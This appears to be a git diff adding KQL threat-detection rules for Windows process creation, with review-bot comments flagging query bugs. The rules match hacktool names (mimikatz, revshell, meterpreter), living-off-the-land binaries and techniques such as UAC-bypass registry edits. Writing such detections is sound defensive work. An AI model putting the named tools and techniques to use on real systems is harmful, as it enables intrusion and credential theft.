@@ -0,0 +1,13 @@ +// Title: Suspicious Processes Spawned by Java.EXE +// Author: Andreas Hunkeler (@Karneades), Florian Roth +// Date: 2021-12-17 +// Level: high +// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation +// False Positives: +// - Legitimate calls to system binaries +// - Company specific internal usage + +DeviceProcessEvents +| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_winrm.kql b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_winrm.kql new file mode 100644 index 00000000..2e57a8e9 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_winrm.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Processes Spawned by WinRM +// Author: Andreas Hunkeler (@Karneades), Markus Neis +// Date: 2021-05-20 +// Level: high +// Description: Detects suspicious processes including shells spawnd from WinRM host process +// MITRE Tactic: Initial Access +// Tags: attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation +// False Positives: +// - Legitimate WinRM usage + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql b/KQL/rules/windows/process_creation/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql new file mode 100644 index 00000000..fd3524e4 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE +// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +// Date: 2020-05-25 +// Level: high +// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "allowedprogram") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "action=allow" and ProcessCommandLine contains "program=")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and (ProcessCommandLine contains ":\\$Recycle.bin\\" or ProcessCommandLine contains ":\\RECYCLER.BIN\\" or ProcessCommandLine contains ":\\RECYCLERS.BIN\\" or ProcessCommandLine contains ":\\SystemVolumeInformation\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Desktop\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\addins\\" or ProcessCommandLine contains ":\\Windows\\cursors\\" or ProcessCommandLine contains ":\\Windows\\debug\\" or ProcessCommandLine contains ":\\Windows\\drivers\\" or ProcessCommandLine contains ":\\Windows\\fonts\\" or ProcessCommandLine contains ":\\Windows\\help\\" or ProcessCommandLine contains ":\\Windows\\system32\\tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Local Settings\\Temporary Internet Files\\" or ProcessCommandLine 
contains "\\Temporary Internet Files\\Content.Outlook\\" or ProcessCommandLine contains "%Public%\\" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_program_names.kql b/KQL/rules/windows/process_creation/suspicious_program_names.kql new file mode 100644 index 00000000..7b2928ef --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_program_names.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Program Names +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-11 +// Level: high +// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate tools that accidentally match on the searched patterns + +DeviceProcessEvents +| where (ProcessCommandLine contains "inject.ps1" or ProcessCommandLine contains "Invoke-CVE" or ProcessCommandLine contains "pupy.ps1" or ProcessCommandLine contains "payload.ps1" or ProcessCommandLine contains "beacon.ps1" or ProcessCommandLine contains "PowerView.ps1" or ProcessCommandLine contains "bypass.ps1" or ProcessCommandLine contains "obfuscated.ps1" or ProcessCommandLine contains "obfusc.ps1" or ProcessCommandLine contains "obfus.ps1" or ProcessCommandLine contains "obfs.ps1" or ProcessCommandLine contains "evil.ps1" or ProcessCommandLine contains "MiniDogz.ps1" or ProcessCommandLine contains "_enc.ps1" or ProcessCommandLine contains "\\shell.ps1" or ProcessCommandLine contains "\\rshell.ps1" or ProcessCommandLine contains "revshell.ps1" or ProcessCommandLine contains "\\av.ps1" or ProcessCommandLine contains "\\av_test.ps1" or ProcessCommandLine contains "adrecon.ps1" or ProcessCommandLine contains "mimikatz.ps1" or ProcessCommandLine contains "\\PowerUp_" or ProcessCommandLine contains "powerup.ps1" or ProcessCommandLine contains "\\Temp\\a.ps1" or ProcessCommandLine contains "\\Temp\\p.ps1" or ProcessCommandLine contains "\\Temp\\1.ps1" or ProcessCommandLine contains "Hound.ps1" or ProcessCommandLine contains "encode.ps1" or ProcessCommandLine contains "powercat.ps1") or ((FolderPath contains "\\CVE-202" or FolderPath contains "\\CVE202") or (FolderPath endswith "\\poc.exe" or FolderPath endswith "\\artifact.exe" or FolderPath endswith "\\artifact64.exe" or FolderPath endswith "\\artifact_protected.exe" or 
FolderPath endswith "\\artifact32.exe" or FolderPath endswith "\\artifact32big.exe" or FolderPath endswith "obfuscated.exe" or FolderPath endswith "obfusc.exe" or FolderPath endswith "\\meterpreter")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_provlaunch_exe_child_process.kql b/KQL/rules/windows/process_creation/suspicious_provlaunch_exe_child_process.kql new file mode 100644 index 00000000..1ec6834d --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_provlaunch_exe_child_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Provlaunch.EXE Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-08 +// Level: high +// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")) and InitiatingProcessFolderPath endswith "\\provlaunch.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_query_of_machineguid.kql b/KQL/rules/windows/process_creation/suspicious_query_of_machineguid.kql new file mode 100644 index 00000000..757bb1ad --- /dev/null 
+++ b/KQL/rules/windows/process_creation/suspicious_query_of_machineguid.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Query of MachineGUID +// Author: frack113 +// Date: 2022-01-01 +// Level: low +// Description: Use of reg to get MachineGuid information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents +| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Cryptography" and ProcessCommandLine contains "/v " and ProcessCommandLine contains "MachineGuid") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_rasdial_activity.kql b/KQL/rules/windows/process_creation/suspicious_rasdial_activity.kql new file mode 100644 index 00000000..c1b2a5d7 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_rasdial_activity.kql @@ -0,0 +1,12 @@ +// Title: Suspicious RASdial Activity +// Author: juju4 +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious process related to rasdial.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where FolderPath endswith "rasdial.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_rdp_redirect_using_tscon.kql b/KQL/rules/windows/process_creation/suspicious_rdp_redirect_using_tscon.kql new file mode 100644 index 00000000..912a0f06 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_rdp_redirect_using_tscon.kql 
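Review bot: `FolderPath endswith "rasdial.exe"` in the suspicious_rasdial_activity hunk is not anchored on a path separator, unlike every other image match in this change (the MachineGUID hunk on the same line uses `FolderPath endswith "\\reg.exe"`), so any image whose name merely ends in those characters also matches. If the binary itself is meant, `FolderPath endswith "\\rasdial.exe"` is the consistent form; if the upstream rule is deliberately unanchored, a comment saying so would stop the next reader from "fixing" it. The query also has no command-line condition, so despite the title it alerts on every rasdial.exe start, which the False Positives block should state plainly.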
@@ -0,0 +1,10 @@ +// Title: Suspicious RDP Redirect Using TSCON +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-17 +// Level: high +// Description: Detects a suspicious RDP session redirect using tscon.exe +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1563.002, attack.t1021.001, car.2013-07-002 + +DeviceProcessEvents +| where ProcessCommandLine contains " /dest:rdp-tcp#" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql new file mode 100644 index 00000000..b4a46a64 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-10 +// Level: medium +// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where ProcessCommandLine contains "Get-LocalGroupMember " and (ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql new file mode 100644 index 00000000..d9a19b81 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: high +// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 + +DeviceProcessEvents +| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_recursive_takeown.kql b/KQL/rules/windows/process_creation/suspicious_recursive_takeown.kql new file mode 100644 index 00000000..81a23a9c --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_recursive_takeown.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Recursive Takeown +// Author: frack113 +// Date: 2022-01-30 +// Level: medium +// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.001 +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "/f " and ProcessCommandLine contains "/r") and FolderPath endswith "\\takeown.exe" \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/suspicious_redirection_to_local_admin_share.kql b/KQL/rules/windows/process_creation/suspicious_redirection_to_local_admin_share.kql new file mode 100644 index 00000000..5f4fcf52 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_redirection_to_local_admin_share.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Redirection to Local Admin Share +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-16 +// Level: high +// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048 + +DeviceProcessEvents +| where ProcessCommandLine contains ">" and (ProcessCommandLine contains "\\\\127.0.0.1\\admin$\\" or ProcessCommandLine contains "\\\\localhost\\admin$\\") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_reg_add_bitlocker.kql b/KQL/rules/windows/process_creation/suspicious_reg_add_bitlocker.kql new file mode 100644 index 00000000..56d1c284 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_reg_add_bitlocker.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Reg Add BitLocker +// Author: frack113 +// Date: 2021-11-15 +// Level: high +// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "EnableBDEWithNoTPM" or ProcessCommandLine contains "UseAdvancedStartup" or ProcessCommandLine contains "UseTPM" or ProcessCommandLine contains "UseTPMKey" or ProcessCommandLine contains "UseTPMKeyPIN" or ProcessCommandLine contains "RecoveryKeyMessageSource" or ProcessCommandLine contains "UseTPMPIN" or ProcessCommandLine contains "RecoveryKeyMessage") and (ProcessCommandLine contains "REG" and ProcessCommandLine contains "ADD" and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\FVE" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/f") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_reg_add_open_command.kql b/KQL/rules/windows/process_creation/suspicious_reg_add_open_command.kql new file mode 100644 index 00000000..4903a241 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_reg_add_open_command.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Reg Add Open Command +// Author: frack113 +// Date: 2021-12-20 +// Level: medium +// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/ve " and ProcessCommandLine contains "/d") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "DelegateExecute") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_registry_modification_from_ads_via_regini_exe.kql b/KQL/rules/windows/process_creation/suspicious_registry_modification_from_ads_via_regini_exe.kql new file mode 100644 index 00000000..20e2e203 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_registry_modification_from_ads_via_regini_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Registry Modification From ADS Via Regini.EXE +// Author: Eli Salem, Sander Wiebing, oscd.community +// Date: 2020-10-12 +// Level: high +// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion + +DeviceProcessEvents +| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and ProcessCommandLine matches regex ":[^ \\\\]" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_regsvr32_execution_from_remote_share.kql b/KQL/rules/windows/process_creation/suspicious_regsvr32_execution_from_remote_share.kql new file mode 100644 index 00000000..0e32de9b --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_regsvr32_execution_from_remote_share.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Regsvr32 Execution From Remote Share +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-31 +// Level: high +// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 + +DeviceProcessEvents +| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_remote_child_process_from_outlook.kql b/KQL/rules/windows/process_creation/suspicious_remote_child_process_from_outlook.kql new file mode 100644 index 00000000..ea0fa1fc --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_remote_child_process_from_outlook.kql 
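Review bot: In the suspicious_regsvr32_execution_from_remote_share hunk, `ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE"` carries a leading backslash, and OriginalFileName values hold a bare file name, so that alternative can never match and the rule silently reduces to the FolderPath check. The regini hunk on the same line and the netsh and odbcconf rules elsewhere in this change compare the bare name (`=~ "REGINI.EXE"`), which is what this should be too: `ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE"`. Since the file is generated, it is worth checking whether the backslash comes from the upstream rule or from the converter's path-escaping step so it is fixed at the source rather than in this output.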
@@ -0,0 +1,10 @@ +// Title: Suspicious Remote Child Process From Outlook +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-12-27 +// Level: high +// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202 + +DeviceProcessEvents +| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\outlook.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_response_file_execution_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/suspicious_response_file_execution_via_odbcconf_exe.kql new file mode 100644 index 00000000..9d59bb0c --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_response_file_execution_via_odbcconf_exe.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Response File Execution Via Odbcconf.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: high +// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not((ProcessCommandLine contains ".rsp" or (ProcessCommandLine contains ".exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"" and FolderPath =~ "C:\\Windows\\System32\\odbcconf.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\runonce.exe")))) \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/suspicious_runas_like_flag_combination.kql b/KQL/rules/windows/process_creation/suspicious_runas_like_flag_combination.kql new file mode 100644 index 00000000..bc5532ac --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_runas_like_flag_combination.kql @@ -0,0 +1,10 @@ +// Title: Suspicious RunAs-Like Flag Combination +// Author: Florian Roth (Nextron Systems) +// Date: 2022-11-11 +// Level: medium +// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation + +DeviceProcessEvents +| where (ProcessCommandLine contains " -c cmd" or ProcessCommandLine contains " -c \"cmd" or ProcessCommandLine contains " -c powershell" or ProcessCommandLine contains " -c \"powershell" or ProcessCommandLine contains " --command cmd" or ProcessCommandLine contains " --command powershell" or ProcessCommandLine contains " -c whoami" or ProcessCommandLine contains " -c wscript" or ProcessCommandLine contains " -c cscript") and (ProcessCommandLine contains " -u system " or ProcessCommandLine contains " --user system " or ProcessCommandLine contains " -u NT" or ProcessCommandLine contains " -u \"NT" or ProcessCommandLine contains " -u 'NT" or ProcessCommandLine contains " --system " or ProcessCommandLine contains " -u administrator ") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_rundll32_activity_invoking_sys_file.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_activity_invoking_sys_file.kql new file mode 100644 index 00000000..ca52bdec --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_rundll32_activity_invoking_sys_file.kql 
@@ -0,0 +1,10 @@
+// Title: Suspicious Rundll32 Activity Invoking Sys File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "rundll32.exe" and (ProcessCommandLine contains ".sys," or ProcessCommandLine contains ".sys ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_rundll32_execution_with_image_extension.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_execution_with_image_extension.kql
new file mode 100644
index 00000000..48fbf13d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_rundll32_execution_with_image_extension.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Rundll32 Execution With Image Extension
+// Author: Hieu Tran
+// Date: 2023-03-13
+// Level: high
+// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".cr2" or ProcessCommandLine contains ".eps" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".ico" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".nef" or ProcessCommandLine contains ".orf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".raw" or ProcessCommandLine contains ".sr2" or ProcessCommandLine contains ".tif" or ProcessCommandLine contains ".tiff") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_rundll32_invoking_inline_vbscript.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_invoking_inline_vbscript.kql
new file mode 100644
index 00000000..b46e149a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_rundll32_invoking_inline_vbscript.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Rundll32 Invoking Inline VBScript
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "Execute" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_rundll32_setupapi_dll_activity.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_setupapi_dll_activity.kql
new file mode 100644
index 00000000..005aff3c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_rundll32_setupapi_dll_activity.kql
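Review bot: The header line `// MITRE Tactic: Privilege Escalation` carries only the first tactic, while the `// Tags:` line directly below also lists attack.defense-evasion; the same single-tactic header appears in the other rules in this change whose tags carry several tactics (the masqueraded-XML, schtasks and runscripthelper rules, for example). An analyst filtering rules by tactic from the comment header would miss the second mapping. The converter could emit every tactic-level tag on that line, e.g. `// MITRE Tactic: Privilege Escalation, Defense Evasion`, or the line could be dropped in favour of the complete Tags line so the header does not contradict itself.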
@@ -0,0 +1,12 @@
+// Title: Suspicious Rundll32 Setupapi.dll Activity
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - Scripts and administrative tools that use INF files for driver installation with setupapi.dll
+
+DeviceProcessEvents
+| where FolderPath endswith "\\runonce.exe" and (InitiatingProcessCommandLine contains "setupapi.dll" and InitiatingProcessCommandLine contains "InstallHinfSection") and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_runscripthelper_exe.kql b/KQL/rules/windows/process_creation/suspicious_runscripthelper_exe.kql
new file mode 100644
index 00000000..d4bcb169
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_runscripthelper_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Runscripthelper.exe
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of powershell scripts via Runscripthelper.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe"
\ No newline at end of file
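Review bot: The Description of the setupapi rule ends with "(see references)" but the generated header has no references line, so the pointer dangles; none of the rules in this change carry one, which suggests the upstream rule's references field is not emitted by the converter. Either emit that field as `// References:` lines in the header so the analyst can follow the pointer, or strip the parenthetical during conversion so the comment is self-contained. The runscripthelper rule later on the same line has the same header layout and would benefit from the same change.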
diff --git a/KQL/rules/windows/process_creation/suspicious_scan_loop_network.kql b/KQL/rules/windows/process_creation/suspicious_scan_loop_network.kql
new file mode 100644
index 00000000..909af7df
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_scan_loop_network.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Scan Loop Network
+// Author: frack113
+// Date: 2022-03-12
+// Level: medium
+// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
+// False Positives:
+// - Legitimate script
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_involving_temp_folder.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_involving_temp_folder.kql
new file mode 100644
index 00000000..2ed0fc11
